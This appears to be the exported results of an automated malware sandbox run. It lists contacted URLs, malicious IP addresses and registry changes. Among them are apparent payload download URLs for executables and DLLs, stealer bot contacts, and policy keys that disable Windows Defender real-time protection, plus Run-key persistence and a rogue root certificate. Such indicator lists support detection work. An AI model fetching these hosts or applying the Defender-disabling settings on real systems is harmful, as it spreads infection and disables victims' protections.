https://ipinfo.io/widget/demo/89.187.182.8-C
unknown
https://papi.vk.com/pushsse/ruim
unknown
https://sun6-23.userapi.com/
unknown
https://vk.com/doc5294803_668776833?hash=0O6PF91bZH66jRdVdr0Yhs0vV73FDPMFrSckqwaaZuH&dl=PH90vp0b08Gc
unknown
http://185.172.128.151/8420e83ceb95f3af/vcruntime140.dll
unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
unknown
http://www.valvesoftware.com/legal.htm
unknown
https://sun6-21.userapi.com/W
unknown
http://193.233.132.167/cost/go.exe
unknown
https://greetclassifytalk.shop/
unknown
https://vk.com
unknown
https://www.instagram.com
unknown
https://sun6-21.userapi.com/:
unknown
https://95.217.242.142
unknown
https://95.217.242.142/mozglue.dlla
unknown
https://thridparty.nservices.org/api/browser/GetScript?id=$
unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
unknown
https://db-ip.com/demo/home.php?s=89.187.182.8rc
unknown
https://discord.com/api/v9/users/
unknown
http://185.172.128.151/8420e83ceb95f3af/vcruntime140.dlll
unknown
https://sun6-23.userapi.com/1;
unknown
https://turnitin.com/robot/crawlerinfo.html)cannot
unknown
https://ipinfo.io/widget/demo/89.187.182.8
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://pofix.red/upd/index.php&8
unknown
https://greetclassifytalk.shop:443/apichost.exe
unknown
http://www.innosetup.com/
unknown
http://www.autoitscript.com/autoit3/J
unknown
https://api.ip.sb/ip
unknown
http://185.172.128.151/8420e83ceb95f3af/vcruntime140.dll2.128.151
unknown
https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
unknown
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
unknown
http://ns.adp/1.0/P
unknown
http://sextipolar.sbs/qwqw
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://sun6-22.userapi.com/
unknown
http://185.172.128.151/ons
unknown
https://t.me/RiseProSUPPORT
unknown
https://steamcommunity.com/profiles/76561199680449169/badges
unknown
https://www.ecosia.org/newtab/
unknown
https://triedchicken.net:80/cad54ba5b01423b1af8ec10ab5719d97.exe
unknown
https://stats.vk-portal.net
unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
unknown
http://nsis.sf.net/NSIS_Error
unknown
https://st6-22.vk.com/css/al/fonts_utf.7fa94ada.css
unknown
https://greetclassifytalk.shop/apie
unknown
https://ipinfo.io/
unknown
https://r.mradx.net
unknown
http://www.google.com/feedfetcher.html)HKLM
unknown
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
unknown
https://db-ip.com/demo/home.php?s=89.187.182.8td
unknown
https://ipinfo.io/namehttps://ipgeolocation.io/status
unknown
https://blockchain.infoindex
unknown
https://sun6-20.userapi.com/G;
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
unknown
https://t.me/risepro_bot2.8
unknown
http://ns.adp/1.0/
unknown
https://vk.com:80/doc5294803_669074803?hash=gtxjyDdukAIKxlWY09AIJPG5gj5TRTjhoVyhzgbP72o&dl=A9s6LaMpu
unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=c4Un
unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
unknown
http://sextipolar.sbs/qwqwaM
unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
unknown
https://f.123654987.xyz/
unknown
http://185.172.128.151/8420e83ceb95f3af/vcruntime140.dll.
unknown
http://185.172.128.151/8420e83ceb95f3af/msvcp140.dll
unknown
https://static.vk.me
unknown
http://185.172.128.151/8420e83ceb95f3af/nss3.dll4
unknown
http://www.gzip.org/zlib/rfc-gzip.html
unknown
https://st6-22.vk.com
unknown
http://185.172.128.151/7043a0c6a68d9c65.php/
unknown
https://monoblocked.com:80/525403/setup.exe9
unknown
http://185.172.128.151/7043a0c6a68d9c65.php3
unknown
https://95.217.242.14223bc2f9dfnt-Disposition:
unknown
https://sun6-20.userapi.com/c909218/u5294803/docs/d34/f1a613c9f905/offerv5.bmp?extra=D5TreVkpwJw5KIf
unknown
http://185.172.128.151/7043a0c6a68d9c65.php4
unknown
https://help.steampowered.com/en/
unknown
https://t.me/risepro_botD
unknown
http://147.45.47.102:57893/hera/amadka.exe
unknown
http://193.233.132.253/lumma2804.exe1
unknown
https://dkgxxh1czdosr.cloudfront.net:80/load/download.php?c=1000bq
unknown
http://185.172.128.151/7043a0c6a68d9c65.php8
unknown
https://95.217.242.142/u
unknown
https://api.ip.s
unknown
https://f.123654987.xyz/525403/setup.exeings
unknown
https://95.217.242.142/nss3.dllm
unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
unknown
https://cdn.ampproject.org
unknown
https://95.217.242.142/j
unknown
https://monoblocked.com/525403/setup.exe
unknown
https://ipinfo.io:443/widget/demo/89.187.182.8
unknown
There are 90 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
185.172.128.90
unknown
Russian Federation
malicious
185.172.128.151
unknown
Russian Federation
malicious
5.42.65.96
unknown
Russian Federation
malicious
193.233.132.139
unknown
Russian Federation
220.82.134.210
unknown
Korea Republic of
108.156.105.24
unknown
United States
34.117.186.192
unknown
United States
85.192.56.26
unknown
Russian Federation
37.221.125.202
unknown
Lithuania
172.67.172.104
unknown
United States
104.21.82.182
unknown
United States
193.233.132.253
unknown
Russian Federation
23.210.138.105
unknown
United States
172.67.132.113
unknown
United States
104.21.49.118
unknown
United States
95.142.206.3
unknown
Russian Federation
95.217.242.142
unknown
Germany
95.142.206.0
unknown
Russian Federation
95.142.206.2
unknown
Russian Federation
147.45.47.93
unknown
Russian Federation
95.142.206.1
unknown
Russian Federation
104.21.63.150
unknown
United States
99.84.170.75
unknown
United States
185.172.128.203
unknown
Russian Federation
104.21.32.111
unknown
United States
104.26.4.15
unknown
United States
172.67.75.163
unknown
United States
5.42.66.10
unknown
Russian Federation
5.42.65.64
unknown
Russian Federation
18.154.109.109
unknown
United States
104.21.10.62
unknown
United States
104.21.51.78
unknown
United States
104.21.91.214
unknown
United States
45.130.41.108
unknown
Russian Federation
87.240.129.133
unknown
Russian Federation
There are 25 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{EE81BCD0-724A-4EB2-99D9-0D86780B2872}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions
Exclusions_Extensions
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{EE81BCD0-724A-4EB2-99D9-0D86780B2872}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions
exe
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{EE81BCD0-724A-4EB2-99D9-0D86780B2872}Machine\SOFTWARE\Policies\Microsoft\Windows Defender
DisableAntiSpyware
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{EE81BCD0-724A-4EB2-99D9-0D86780B2872}Machine\SOFTWARE\Policies\Microsoft\Windows Defender
DisableRoutinelyTakingAction
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{EE81BCD0-724A-4EB2-99D9-0D86780B2872}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableBehaviorMonitoring
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{EE81BCD0-724A-4EB2-99D9-0D86780B2872}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableOnAccessProtection
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{EE81BCD0-724A-4EB2-99D9-0D86780B2872}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableScanOnRealtimeEnable
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{EE81BCD0-724A-4EB2-99D9-0D86780B2872}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableRealtimeMonitoring
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{EE81BCD0-724A-4EB2-99D9-0D86780B2872}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableIOAVProtection
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{EE81BCD0-724A-4EB2-99D9-0D86780B2872}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableRawWriteNotification
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RageMP131
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ExtreamFanV5
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
Blob
 malicious
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules
C:\
HKEY_CURRENT_USER\SOFTWARE\Microsoft\a839a7d7
Servers
HKEY_CURRENT_USER\SOFTWARE\Microsoft\a839a7d7
UUID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\a839a7d7
FirstInstallDate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\a839a7d7
ServiceVersion
HKEY_CURRENT_USER\SOFTWARE\Microsoft\a839a7d7
PGDSE
HKEY_CURRENT_USER\SOFTWARE\Microsoft\a839a7d7
ServersVersion
HKEY_CURRENT_USER\SOFTWARE\Microsoft\a839a7d7
OSCaption
HKEY_CURRENT_USER\SOFTWARE\Microsoft\a839a7d7
OSArchitecture
HKEY_CURRENT_USER\SOFTWARE\Microsoft\a839a7d7
IsAdmin
HKEY_CURRENT_USER\SOFTWARE\Microsoft\a839a7d7
AV
HKEY_CURRENT_USER\SOFTWARE\Microsoft\a839a7d7
PatchTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\6208
Terminator
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\6208
Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\6208
CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\4208
Terminator
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\4208
Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\4208
CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\8568
Terminator
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\8568
Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\8568
CreationTime
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
ProgramId
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
FileId
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
LowerCaseLongPath
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
LongPathHash
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
Name
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
OriginalFileName
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
Publisher
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
Version
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
BinFileVersion
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
BinaryType
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
ProductName
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
ProductVersion
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
LinkDate
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
BinProductVersion
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
AppxPackageFullName
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
AppxPackageRelativeId
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
Size
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
Language
\REGISTRY\A\{ad286890-e4b2-26c7-4b86-7624c34359ea}\Root\InventoryApplicationFile\7j4wlhtapwixkzan|4d588b8001afa7bd
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
Inno Setup: Setup Version
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
Inno Setup: App Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
InstallLocation
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
Inno Setup: Icon Group
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
Inno Setup: User
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
Inno Setup: Language
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
QuietUninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
NoModify
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
NoRepair
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Jenim VOX Free_is1
EstimatedSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
